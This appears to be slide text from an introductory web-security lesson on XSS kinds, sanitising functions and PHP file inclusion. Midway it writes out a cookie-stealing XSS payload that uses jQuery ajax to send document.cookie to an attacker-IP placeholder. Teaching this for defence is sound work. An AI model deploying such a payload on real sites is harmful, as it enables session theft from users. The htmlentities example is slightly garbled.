• JS code can be added to HTML pages.
• It can affect the page’s behavior.
• It can manage communication.
• It can handle events.

• Event Handlers: JS events such as onclick can be applied in HTML tags.
• Script Tags: JS typically is defined using <script> tags.
• External Files: JavaScript can be imported via external files.

• XSS is a client-side attack.
• It can affect other users by storing the code.
• It exploits vulnerability in web applications.
• It allows the injection of malicious scripts.

• Reflected XSS: A payload is sent to a server, which then sends a response based on the payload’s content.
• Stored XSS: A payload is stored on the server and affects all users working with the server.
• DOM XSS: A payload executes locally by corrupting the Document Object Model.

• A website with a user input interface.
• A request is sent to the server to process.
• The result is returned after processing due to lack of protection.

• The payload is saved in the database.
• Every user who views the list is affected.
• Can be implemented on websites with comments and chats.

• Websites print information from their URLs.
• Even though there is no user input, the DOM can be leveraged for the attack.
• For the DOM to affect other users, the URL must be sent to them.

Cookie Value - A string of letters or numbers that verify, track, and store user information Cookie Theft - An XSS attack can acquire a cookie to steal a session.

• Defacing
• Cookie Theft
• Clickjacking
• Trojan Delivery

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

• The command imports jQuery.
• A JavaScript library
• Enables simple code usage
• Imported using Google CDN
• The command imports a library named jQuery that contains useful functions. These functions can perform custom requests.

<script>$.ajax({url:”http://[attacker’s IP]”, type:”GET”, data:document.cookie})</script>

• $.ajax(): Allows asynchronous communication
• url: Whom to communicate with
• type: The HTTP method
• data: The information that is sent
• The command retrieves the target’s cookie and sends it to another address using Ajax.

• RegEx: Typically used in programming to provide search patterns
• Htmlspecialchars: Sterilizes data and replaces dangerous characters such as <
• Htmlentities: Sterilizes data using safe alternatives instead of dangerous characters

• A webpage is using Htmlentities if the <> characters in a payload are changed to <>&quat;

• Common in PHP-based websites
• Leverages the option to include code
• Uses the include() function
• Allows the display of sensitive files and data

• Remote file inclusion (RFI) is similar to LFI.
• Accesses remote servers to deliver files
• Lacks remote file validation

• The include() function allows using data from other PHP files.
• Can be leveraged for malicious purposes